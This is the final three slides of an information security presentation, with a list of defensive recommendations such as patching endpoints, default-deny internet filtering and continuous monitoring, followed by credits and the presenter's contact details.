  • 56. What can we do? • Patch endpoint • Tighten the Internet filtering (default deny if possible) • No Internet surfing with admin rights • See what’s happening (continuous monitoring) • Check if you’re well (regular technical audits) • Educate people
  • 57. Credits • Sergey V. Soldatov, TBINFORM (TNK-BP Group) • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group) • Wayne Huang, ARMORIZE
  • 58. THE END Vladimir B. Kropotov Information security analyst TBINFORM (TNK-BP Group) vbkropotov@tnk-bp.com kropotov@ieee.org